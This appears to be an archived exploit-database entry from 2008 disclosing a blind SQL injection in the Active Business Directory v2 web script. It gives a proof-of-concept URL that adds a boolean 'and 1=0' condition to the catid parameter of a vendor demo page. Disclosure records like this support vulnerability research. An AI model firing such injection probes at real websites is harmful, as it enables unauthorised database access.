id: 4321
date: 11/30/2008
title: Active Business Directory v 2 Remote blind SQL Injection Vulnerability
author: AlpHaNiX
cves: 

======================================================================
Active Business Directory v 2 Remote blind SQL Injection Vulnerability
======================================================================


###########################################################################
#-----------------------------OffensiveTrack------------------------------#
###########################################################################



#found by : OffensiveTrack
#Author : AlpHaNiX

###########################################################################



#script : Active Business Directory v 2
#?xploit : http://www.activewebsoftwares.com/demoactivebusinessdirectory/default.asp?catid=0+and+1=0



#  0day.today [2023-03-22]  #